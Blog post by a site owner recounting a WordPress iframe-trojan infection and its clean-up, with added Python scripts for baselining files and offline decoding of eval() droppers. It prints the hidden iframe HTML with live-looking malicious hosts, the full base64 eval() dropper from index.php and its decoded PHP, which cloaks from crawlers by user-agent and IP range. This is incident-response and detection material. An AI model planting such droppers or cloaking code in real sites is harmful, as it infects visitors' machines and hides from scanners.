Forfly 翔!
Mr. Le's personal blog: life, love and other things. Life is like a journey; what matters is not the destination but the scenery along the way!
All Rights reserved by Mr. Le

WordPress site infected with an iframe trojan

<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://cucokakey111.vv.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==" width="2" height="2"></iframe></div>

Very frustrating: every one of my WordPress sites has had this link injected. A friend told me that after visiting my site he spent four hours repairing his computer.

This is a classic IFRAME trojan. I had already felt something was off with the site lately: the layout used to be centered, but now the whole site was pushed over to the left. It had probably been infected for quite a while.

I feel helpless and sorry for the friends who got hurt. Do all these hackers really have nothing better to do? Why pick on my tiny little site?

First, some background: all of my WordPress sites are hosted on ixwebhosting. I have contacted ixwebhosting; I don't know yet what measures they will take to fix it. My other site, a forum running the DX software, has shown no problem, so presumably this trojan targets WP only. Viewing the page source of any of the affected sites shows:

<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://cucokakey111.vv.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==" width="2" height="2"></iframe></div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<head profile="http://gmpg.org/xfn/11">

The culprit is plain to see. The injected <div> is emitted before the <!DOCTYPE> declaration, and that is what broke the layout: a document that does not begin with its doctype is rendered in quirks mode, so the centering was lost and everything slid to the left. The iframe inside it, pushed off-screen and only 2 by 2 pixels, silently loads a malicious external site.

But index.php and header.php in the theme showed nothing unusual.

That puzzled me: what was the cause? Working through the order in which WordPress loads its files, I checked the site's root INDEX.PHP and finally found the anomaly.

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZX
InLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ
3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnL
CdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRl
cm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9y
ZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90
ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KC
WFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiIC
ApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU
1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSI
pLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA
4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyM
TYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4L
jEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC4
2OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xO
TIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2
NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU
1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiK
Q0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICg
gJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX
2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA
8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2l
nbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IH
RydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk
5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL3lpZGV0ZWoxMTEuY3ouY2MvUVFrRkJ3UUdEUU1HQndZQUVrY
0pCUWNFQVFFQ0RRQUdBUT09IiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj48L2lmcmFtZT48L2Rpdj4nOw0KfQ=='
));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

A normal WordPress index.php does not contain the part shown in red, the eval(base64_decode(...)) line at the very top; everything after it is the stock file. I guessed this encoded block was doing the mischief. I tried a few tools to decode it without success, so I simply overwrote the file with a clean index.php.

With that, the site was back to normal.

Finally, to sum up. For an IFRAME trojan on a WordPress install, the usual approach is: first open the site and view the page source, looking for hidden links to external hosts; then go through the root INDEX.PHP. If that finds nothing, follow the order in which WordPress loads its files: WP-BLOG-HEADER.PHP, then wp-load.php (which in turn pulls in wp-config.php and wp-settings.php, so include those), then wp-includes/template-loader.php, and finally the theme's INDEX.PHP and header.php. I assumed that tampering with the theme was unlikely, since it is more trouble for the attacker, who cannot easily tell which theme is active. As it turned out (see below), the infected file in my case was the theme's functions.php; WordPress includes the active theme's functions.php on every request, which makes it as reliable a foothold as index.php.

When you are done, remember to change the FTP password. I still cannot figure out how the hacker managed to modify the files. Could it be one of the interactive plugins I use? Note that a new FTP password only helps if the FTP credentials were the way in: as long as a backdoor file remains on the server, the attacker does not need the password at all.

There are plenty of posts online about how to block IFRAME structures; the diligent can give them a try.

Incidentally, IXWEBHOSTING is pretty good; they seem to have been testing things the whole time and made a backup for me in the back end. In the end I sorted it out myself, though. Hahaha.

I celebrated too early. I thought overwriting the file would be the end of it, but a few hours later I found that the hacker's program had modified index.php again. Left with no choice, I decided to decode it first.
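Reinfection a few hours after a manual fix means the file that was overwritten was only the symptom: something else on the server is writing it back. The practical response is to compare the whole install against a known-good baseline rather than hunting file by file. For core files, WP-CLI's wp core verify-checksums does this against the official checksums; themes, plugins and uploads need a baseline of your own. The script below is an added example, not code from this post or from WordPress: it hashes every file under the web root, stores the baseline outside the web root, and after a change lists what was modified, added or removed, singling out files that carry an obfuscated eval() as the dropper candidates to read first. The mini install it builds, its file contents and the host malware.example are constructed stand-ins, not real WordPress sources.

```python
"""Added example: baseline a WordPress tree by content hash, then diff after a
suspected re-infection so every touched file shows up, not only the noticed one."""
import base64
import hashlib
import json
import re
import tempfile
from pathlib import Path

# obfuscated eval() wrappers of the kind quoted in the post
DROPPER_RE = re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")


def snapshot(root: Path) -> dict:
    """relative path -> sha256 of contents, for every regular file under root.
    Hashes, not mtimes: an attacker can reset a timestamp, not a digest."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_snapshots(before: dict, after: dict) -> dict:
    return {
        "modified": sorted(k for k in before if k in after and before[k] != after[k]),
        "added": sorted(k for k in after if k not in before),
        "removed": sorted(k for k in before if k not in after),
    }


def triage(root: Path, baseline: dict) -> dict:
    """Diff the live tree against the baseline; changed or new files that carry an
    obfuscated eval() are listed separately as the first things to read."""
    report = diff_snapshots(baseline, snapshot(root))
    report["dropper_candidates"] = sorted(
        f for f in report["modified"] + report["added"]
        if DROPPER_RE.search((root / f).read_text(encoding="latin-1", errors="replace")))
    return report


# ---- constructed mini install; contents are stand-ins, not real WordPress files ----
CLEAN_FILES = {
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
    "wp-blog-header.php": "<?php\nrequire_once('./wp-load.php');\nwp();\n",
    "wp-content/themes/default/header.php": "<!DOCTYPE html>\n<html>\n",
    "wp-content/themes/default/functions.php": "<?php\nadd_theme_support('menus');\n",
}
_STUB_BODY = "eval(base64_decode('" + base64.b64encode(
    b"echo '<iframe src=\"http://malware.example/\" width=\"2\" height=\"2\"></iframe>';").decode() + "'));"
INFECTED_FILES = dict(CLEAN_FILES)
INFECTED_FILES["index.php"] = "<?php " + _STUB_BODY + " ?>\n" + CLEAN_FILES["index.php"]  # the symptom the post saw
INFECTED_FILES["wp-content/themes/default/functions.php"] += _STUB_BODY + "\n"            # included on every request
INFECTED_FILES["wp-content/uploads/cache.php"] = "<?php " + _STUB_BODY + " ?>\n"           # a new file, easy to miss


def write_tree(root: Path, files: dict) -> None:
    for rel, text in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(text)


def demo() -> dict:
    """Baseline a clean tree, let it get re-infected, and triage the difference."""
    with tempfile.TemporaryDirectory() as tmp:
        site, store = Path(tmp, "site"), Path(tmp, "baseline.json")
        write_tree(site, CLEAN_FILES)
        store.write_text(json.dumps(snapshot(site)))   # keep the baseline outside the web root
        write_tree(site, INFECTED_FILES)                 # "a few hours later", as in the post
        return triage(site, json.loads(store.read_text()))


if __name__ == "__main__":
    for key, files in demo().items():
        print(f"{key}: {files}")
```

In real use, take the baseline right after a clean install or a verified clean-up, store it off the host, and run triage() from a shell on the server (or over a copy of the tree) before and after any change you did not make yourself. The diff is what tells you whether overwriting index.php was enough.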

http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php

When pasting the text in, note that it must begin with <?php and end with ?>.

Decoded, the red (base64) block from above reads:

error_reporting(0);   // hide any PHP warnings so the injection never shows up in the page
$bot = FALSE ;
// Visitors whose User-Agent contains any of these strings are treated as crawlers or tools
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// Source address ranges treated as crawlers (largely search-engine crawler space); they never get the iframe
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0"  ,"64.68.87.255"  ),
    array("66.102.0.0",  "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
// Compare the visitor's address against every range
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
// ...and the User-Agent against every signature
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// Only ordinary browsers receive the off-screen iframe; crawlers and scanners see a clean page
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://yidetej111.cz.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==" width="2" height="2"></iframe></div>';
}

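The procedure from the summary above (view the page source for off-screen links, then go through the PHP files in loading order) and the decoding step can both be done offline, without pasting site code into a third-party web tool. The following Python script is an added example, not code from this post or from WordPress: it walks an install, finds eval() wrappers around base64_decode()/gzinflate() blobs, unpacks them layer by layer the way PHP would, and reports the iframe targets, the crawler user-agent list and the address ranges the dropper excludes, which is how the cloaking works: search-engine crawlers and scanners get a clean page, only ordinary visitors get the iframe. It also flags iframes hidden by size or by an off-screen container in rendered HTML. The sample index.php, its dropper, the host malware.example and the HTML page are all constructed for the example.

```python
"""Added example: find eval()+base64/gzinflate wrappers in PHP files, unpack them
offline, and report what the hidden payload does."""
import base64
import re
import zlib
from pathlib import Path

# eval( <one or more decoder wrappers> 'BASE64 BLOB' );  the blob may be wrapped over many lines
INJECTION_RE = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|base64_decode)\s*\(\s*)+)"
    r"['\"]?([A-Za-z0-9+/=\s]{40,})['\"]?\s*\)+\s*;", re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc=[\"']([^\"']+)[\"'][^>]*>", re.I)
UA_LIST_RE = re.compile(r"\$user_agent_to_filter\s*=\s*array\((.*?)\)\s*;", re.S)
IP_RANGE_RE = re.compile(r"array\(\s*\"([\d.]+)\"\s*,\s*\"([\d.]+)\"\s*\)")


def unwrap(chain: str, blob: str) -> str:
    """Apply the decoder chain innermost-first, exactly as PHP evaluates it."""
    data = blob.encode("ascii")
    for fn in reversed(re.findall(r"[a-z0-9_]+", chain)):
        if fn == "base64_decode":
            data = base64.b64decode(data)      # non-strict: embedded newlines are skipped, as in PHP
        elif fn == "gzinflate":
            data = zlib.decompress(data, -15)  # PHP gzinflate() is raw DEFLATE, no zlib header
        elif fn == "gzuncompress":
            data = zlib.decompress(data)
    return data.decode("latin-1")


def analyse_payload(php: str) -> dict:
    """Indicators a responder wants from a decoded dropper."""
    m = UA_LIST_RE.search(php)
    return {
        "iframes": IFRAME_RE.findall(php),
        "user_agent_filter": re.findall(r"'([^']*)'", m.group(1)) if m else [],
        "ip_ranges": IP_RANGE_RE.findall(php),
        # branches on the visitor: crawlers and scanners never see the iframe
        "cloaked": "HTTP_USER_AGENT" in php or "REMOTE_ADDR" in php,
        "silenced_errors": "error_reporting(0)" in php,
    }


def extract_injections(php_source: str, max_depth: int = 5) -> list:
    """One report per eval(...) wrapper found; nested wrappers are peeled layer by layer."""
    reports = []
    for m in INJECTION_RE.finditer(php_source):
        layers, payload = [m.group(1).strip()], unwrap(m.group(1), m.group(2))
        for _ in range(max_depth):
            inner = INJECTION_RE.search(payload)
            if not inner:
                break
            layers.append(inner.group(1).strip())
            payload = unwrap(inner.group(1), inner.group(2))
        reports.append({"layers": layers, "payload": payload, **analyse_payload(payload)})
    return reports


def find_hidden_iframes(html: str) -> list:
    """src of every iframe that is tiny, invisible, or inside an off-screen <div>."""
    hidden = []
    for m in IFRAME_RE.finditer(html):
        before = html[:m.start()]
        open_div, close_div = before.rfind("<div"), before.rfind("</div>")
        container = before[open_div:] if open_div > close_div else ""  # nearest still-open <div>
        sizes = re.findall(r"\b(?:width|height)=[\"']?(\d+)", m.group(0), re.I)
        tiny = bool(sizes) and all(int(v) <= 10 for v in sizes)
        invisible = re.search(r"(?:left|top)\s*:\s*-\d+px|display\s*:\s*none|visibility\s*:\s*hidden",
                              container + m.group(0), re.I)
        if tiny or invisible:
            hidden.append(m.group(1))
    return hidden


def scan_tree(root: Path) -> dict:
    """Walk an install; map each PHP file that carries an injection to its reports."""
    found = {}
    for path in root.rglob("*.php"):
        reports = extract_injections(path.read_text(encoding="latin-1", errors="replace"))
        if reports:
            found[path.relative_to(root).as_posix()] = reports
    return found


# ---- constructed sample, modelled on the dropper quoted in the post (not the real one) ----
DROPPER_PHP = """error_reporting(0);
$bot = FALSE;
$user_agent_to_filter = array('bot','spider','crawl','slurp','yandex');
$stop_ips_masks = array(array("66.249.64.0","66.249.95.255"), array("74.125.0.0","74.125.255.255"));
$ip = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $r) { if ($ip >= sprintf("%u", ip2long($r[0])) && $ip <= sprintf("%u", ip2long($r[1]))) { $bot = TRUE; break; } }
foreach ($user_agent_to_filter as $s) { if (strpos($_SERVER['HTTP_USER_AGENT'], $s) !== false) { $bot = TRUE; break; } }
if (!$bot) { echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://malware.example/QQkF" width="2" height="2"></iframe></div>'; }"""
# PHP gzinflate() wants raw DEFLATE: zlib output minus its 2-byte header and 4-byte checksum
_BLOB = base64.b64encode(zlib.compress(DROPPER_PHP.encode())[2:-4]).decode()
SAMPLE_INDEX_PHP = ("<?php eval(gzinflate(base64_decode('" + _BLOB + "')));\n"
                    "define('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n")
# the same file wrapped in a second eval() layer, as multi-stage droppers do
NESTED_INDEX_PHP = ("<?php eval(base64_decode('"
                    + base64.b64encode(SAMPLE_INDEX_PHP[6:].encode()).decode() + "'));\n")
SAMPLE_HTML = ('<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src='
               '"http://malware.example/QQkF" width="2" height="2"></iframe></div><!DOCTYPE html>'
               '<html><body><iframe src="https://video.example/embed/1" width="560" height="315">'
               '</iframe></body></html>')

if __name__ == "__main__":
    for r in extract_injections(NESTED_INDEX_PHP):
        print("layers:", " > ".join(r["layers"]), "| iframes:", r["iframes"], "| cloaked:", r["cloaked"])
        print("UA filter:", r["user_agent_filter"], "| IP ranges:", r["ip_ranges"])
    print("hidden iframes:", find_hidden_iframes(SAMPLE_HTML))
```

Run scan_tree(Path("/var/www/html")) (path assumed) from a shell on the host or over a copy of the tree; treat every reported src as an indicator to block and report, never as a link to open in a browser. Because the dropper cloaks on User-Agent and source address, fetching your own site with a crawler User-Agent, or from an address in one of the listed ranges, returns a clean page; read the files, not the served HTML, when you are checking whether a clean-up worked.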
But decoding it did not give me a fix either. Then good news arrived from IXWEBHOSTING: they told me the file FUNCTION.PHP (the theme's functions.php) had been infected, and that they had already fixed it for me.

I tested repeatedly over the following days, and the site really is clean now. Many thanks to IXWEBHOSTING for their diligence.

I also did a quick search online and found a few articles; I will translate them later. See the related files.

2011-05-25
